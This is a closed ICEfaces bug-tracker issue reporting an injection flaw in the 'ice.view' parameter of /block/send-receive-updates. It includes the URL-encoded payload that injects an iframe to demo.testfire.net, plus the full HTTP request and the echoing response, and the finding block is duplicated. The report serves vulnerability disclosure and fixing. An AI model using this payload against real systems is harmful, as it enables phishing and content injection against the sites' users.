Details
-
Type: Bug
-
Status: Closed
-
Priority: Major
-
Resolution: Fixed
-
Affects Version/s: 1.8.2
-
Fix Version/s: 1.8.2-EE-GA_P01
-
Component/s: Framework
-
Labels:None
-
Environment:software, vulnerable
Description
Vulnerable URL: /block/send-receive-updates (Parameter:
ice.view)
• Set parameter 'ice.view's value to '1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%
2fwww.w3.org%2f1999%2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%
2fdemo.testfire.net'%2f%3e%3c%2fabc%3e'
Request/Response:
POST /*****/block/send-receive-updates HTTP/1.0
Cookie: ice.lease=1335473860010; updates=; ice.sessions=xu6YNrhn5dhlK6y1l2Gfig#1;
JSESSIONID=kChDPZ2CR1ghQyz02JqY1PTtXhGzT9Th81Qf87GNW2H2TZ3G8MRj!-979418690
Content-Length: 541
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ********:****
Content-Type: application/x-www-form-urlencoded
Referer: http://*****:****/*****/Login.iface
ice.submit.partial=false&ice.event.target=form1&ice.event.captured=null&ice.event.ty
pe=onsubmit&form1=form1&icefacesCssUpdates=&javax.faces.ViewState=1&javax.faces.Rend
erKitId=ICEfacesRenderKit&form1%3AuserName=&form1%3Ainputsecret=1234&form1%
3AmessageForSecurityCode=This+function+is+disabled+for+security&ice.session=xu6YNrhn
5dhlK6y1l2Gfig&ice.view=1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%2fwww.w3.org%2f1999%
2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%2fdemo.testfire.net'%2f%3e%3c%2fabc%
3e&ice.focus=undefined&rand=0.7472490528598428%0A%0A
HTTP/1.1 200 OK
Content-Length: 119
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Connection: close
Date: Thu, 26 Apr 2012 21:11:19 GMT
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
<reload view="1"/><abc xmlns:xyz='http://www.w3.org/1999/xhtml'><xyz:iframe
src='http://demo.testfire.net'/></abc>"/>
Validation In Response:
• <reload view="1"/><abc xmlns:xyz='http://w www.w3.org/1999/xhtml'><xyz:iframe
src='http://demo.testfire.net'/></abc>"/>
Reasoning:
The test response contained a link to the URL "http://demo.testfire.net, which proves that the
Phishing attempt was successful.
ice.view)
• Set parameter 'ice.view's value to '1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%
2fwww.w3.org%2f1999%2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%
2fdemo.testfire.net'%2f%3e%3c%2fabc%3e'
Request/Response:
POST /*****/block/send-receive-updates HTTP/1.0
Cookie: ice.lease=1335473860010; updates=; ice.sessions=xu6YNrhn5dhlK6y1l2Gfig#1;
JSESSIONID=kChDPZ2CR1ghQyz02JqY1PTtXhGzT9Th81Qf87GNW2H2TZ3G8MRj!-979418690
Content-Length: 541
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ********:****
Content-Type: application/x-www-form-urlencoded
Referer: http://*****:****/*****/Login.iface
ice.submit.partial=false&ice.event.target=form1&ice.event.captured=null&ice.event.ty
pe=onsubmit&form1=form1&icefacesCssUpdates=&javax.faces.ViewState=1&javax.faces.Rend
erKitId=ICEfacesRenderKit&form1%3AuserName=&form1%3Ainputsecret=1234&form1%
3AmessageForSecurityCode=This+function+is+disabled+for+security&ice.session=xu6YNrhn
5dhlK6y1l2Gfig&ice.view=1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%2fwww.w3.org%2f1999%
2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%2fdemo.testfire.net'%2f%3e%3c%2fabc%
3e&ice.focus=undefined&rand=0.7472490528598428%0A%0A
HTTP/1.1 200 OK
Content-Length: 119
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Connection: close
Date: Thu, 26 Apr 2012 21:11:19 GMT
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
<reload view="1"/><abc xmlns:xyz='http://www.w3.org/1999/xhtml'><xyz:iframe
src='http://demo.testfire.net'/></abc>"/>
Validation In Response:
• <reload view="1"/><abc xmlns:xyz='http://w www.w3.org/1999/xhtml'><xyz:iframe
src='http://demo.testfire.net'/></abc>"/>
Reasoning:
The test response contained a link to the URL "http://demo.testfire.net, which proves that the
Phishing attempt was successful.
Activity
- All
- Comments
- History
- Activity
- Remote Attachments
- Subversion
May be fixed by http://jira.icesoft.org/browse/ICE-5181